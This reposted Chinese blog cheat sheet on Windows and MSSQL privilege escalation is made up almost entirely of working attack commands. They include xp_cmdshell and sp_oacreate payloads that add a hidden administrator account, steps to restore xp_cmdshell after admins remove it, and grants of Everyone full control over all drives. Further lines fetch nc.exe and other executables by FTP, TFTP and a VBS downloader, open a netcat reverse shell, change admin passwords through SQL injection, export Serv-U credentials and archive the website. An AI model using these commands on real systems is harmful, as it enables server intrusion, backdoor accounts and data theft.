[重要通告]如您遇疑難雜癥,本站支持知識(shí)付費(fèi)業(yè)務(wù),掃右邊二維碼加博主微信,可節(jié)省您寶貴時(shí)間哦!

權(quán)限設(shè)置
cacls.exe c: /e /t /g everyone:F #把c盤設(shè)置為everyone可以瀏覽
cacls.exe d: /e /t /g everyone:F #把d盤設(shè)置為everyone可以瀏覽
cacls.exe e: /e /t /g everyone:F #把e盤設(shè)置為everyone可以瀏覽
cacls.exe f: /e /t /g everyone:F #把f盤設(shè)置為everyone可以瀏覽
cacls d:\website /g everyone /e /t授與完全控制
cacls d:\website /r everyone /e /t取消完全控制
SA加系統(tǒng)用戶
exec master.dbo.xp_cmdshell 'net user admin admin /add'

exec master.dbo.xp_cmdshell 'net localgroup administrators admin /add'

2000servser系統(tǒng):
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user nosex jerry /add'

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators nosex /add'

xp或2003server系統(tǒng):

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user nosex jerry /add'

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators nosex /add'

或者可以

declare @o int
exec sp_oacreate 'wscript.shell', @o out
exec sp_oamethod @o, 'run', NULL, 'XXXXX' \\XXXXX為你要執(zhí)行的命令

恢復(fù)擴(kuò)散
dbcc addextendedproc ("sp_OACreate","odsole70.dll")
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")

如果恢復(fù)不了的解釋:
因?yàn)楣芾韱T是直接刪除dll文件,而沒刪除存儲(chǔ)過程,你這樣恢復(fù)肯定是提示存儲(chǔ)過程已存在了。你要先刪除存儲(chǔ)過程,use master
EXEC sp_dropextendedproc 'xp_cmdshell'

然后上傳xplog70.dll到某個(gè)目錄,例如C盤根目錄,然后執(zhí)行
use master dbcc addextendedproc('xp_cmdshell','c:\xplog70.dll')
就可以使用cmdshell存儲(chǔ)過程執(zhí)行系統(tǒng)指令了。

MB的沒想到網(wǎng)關(guān)都能用NB這樣設(shè)..落伍啦.落伍啦
把他設(shè)置成網(wǎng)關(guān)看看行不行.在NBSI執(zhí)行命令那里輸入:echo interface ip >ip.txt
echo set address "Backup" static 10.90.90.157 255.255.255.0 10.90.90.14 1 >>ip.txt
netsh exec ip.txt
這樣就把網(wǎng)關(guān)設(shè)置為10.90.90.14了,然后我們ipconfig看看是不是有網(wǎng)關(guān)了,

echo interface ip >1.txt
echo set address "本地連接" static 192.168.1.2 255.255.255.0 192.168.1 254 1 >>1.txt
netsh exec 1.txt

address"本地連接的名稱" 可以用ipconfig得到. static IP地址 子網(wǎng)掩碼網(wǎng)關(guān)地址。
好了現(xiàn)在我PING下163看看能不能PING通,如圖8

命令行FTP下載文件
echo open ip >11.txt
echo user >>11.txt
echo pass >>11.txt
echo get nc.exe >>11.txt
echo bye >>11.txt
ftp -s:11.txt

NC做反彈SHELL
在本地監(jiān)聽1234端口 nc -vv -l -p 1234

然后在NBSI執(zhí)行命令那里nc -e cmd.exe ip 1234

改密碼地
http://注入網(wǎng)址;update admin set password='新MD5密碼' where password='舊MD5密碼'-- [admin為表名.]

查看系統(tǒng)在線用戶
query user
注銷用戶
logoff
D:\web\rar.exe a -k -r -s -m1 D:\web\zhu.rar D:\web\
把站點(diǎn)打包到zhu.rar里,

參數(shù)說明:

a 添加文件到壓縮文件中

-k 鎖定壓縮文件

-s產(chǎn)生固體存檔,這樣可以增大壓縮比

-r包括子目錄

-m1 設(shè)置壓縮比

-m0 存儲(chǔ) 添加到壓縮文件時(shí)不壓縮文件。
-m1 最快 使用最快方式(低壓縮)
-m2 較快 使用快速壓縮方式
-m3 標(biāo)準(zhǔn) 使用標(biāo)準(zhǔn)(默認(rèn))壓縮方式
-m4 較好 使用較好壓縮方式(較好壓縮,但是慢)
-m5 最好 使用最大壓縮方式(最好的壓縮,但是最慢

直接 D:\web\rar.exe a -r D:\web\zhu.rar D:\web\ 效果一樣

exec xp_cmdshell 'echo 內(nèi)容 >>絕對(duì)路徑'

sc stop MSSQLSERVER
sc config MSSQLSERVER start= disabled

導(dǎo)SERV-U用戶.和密碼,不過現(xiàn)在版本密碼加密了``

regedit /e "D:\hosting\wwwroot\systones_com\htdocs\su.ini" "HKEY_LOCAL_MACHINE\SOFTWARE\cat soft\serv-u\"

導(dǎo)入是regedit /s xx.reg

端口:HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp

tftp -i serverip get xx.exe

TFTP –I 127.0.0.1 get common.dll c:\common.dll

VBS
--
Set xPost = createObject("Microsoft.XMLHTTP")
xPost.Open "GET","http://127.0.0.1/u.txt",0 '下載文件的地址
xPost.Send()
Set sGet = createObject("ADODB.Stream")
sGet.Mode = 3
sGet.Type = 1
sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile "c:\jp.exe",2

VPN
關(guān)防火和Application Layer Gateway Service

3389登陸
mstsc /console /v:IP:終端端口

問題未解決?付費(fèi)解決問題加Q或微信 2589053300 (即Q號(hào)又微信號(hào))右上方掃一掃可加博主微信

所寫所說,是心之所感,思之所悟,行之所得;文當(dāng)無敷衍,落筆求簡潔。 以所舍,求所獲;有所依,方所成!

支付寶贊助
微信贊助

免責(zé)聲明,若由于商用引起版權(quán)糾紛,一切責(zé)任均由使用者承擔(dān)。

您必須遵守我們的協(xié)議,如您下載該資源,行為將被視為對(duì)《免責(zé)聲明》全部內(nèi)容的認(rèn)可->聯(lián)系老梁投訴資源
LaoLiang.Net部分資源來自互聯(lián)網(wǎng)收集,僅供用于學(xué)習(xí)和交流,請(qǐng)勿用于商業(yè)用途。如有侵權(quán)、不妥之處,請(qǐng)聯(lián)系站長并出示版權(quán)證明以便刪除。 敬請(qǐng)諒解! 侵權(quán)刪帖/違法舉報(bào)/投稿等事物聯(lián)系郵箱:service@laoliang.net
意在交流學(xué)習(xí),歡迎贊賞評(píng)論,如有謬誤,請(qǐng)聯(lián)系指正;轉(zhuǎn)載請(qǐng)注明出處: » 簡單提權(quán)(轉(zhuǎn)老康blog)

發(fā)表回復(fù)

本站承接,網(wǎng)站推廣(SEM,SEO);軟件安裝與調(diào)試;服務(wù)器或網(wǎng)絡(luò)推薦及配置;APP開發(fā)與維護(hù);網(wǎng)站開發(fā)修改及維護(hù); 各財(cái)務(wù)軟件安裝調(diào)試及注冊(cè)服務(wù)(金蝶,用友,管家婆,速達(dá),星宇等);同時(shí)也有客戶管理系統(tǒng),人力資源,超市POS,醫(yī)藥管理等;

立即查看 了解詳情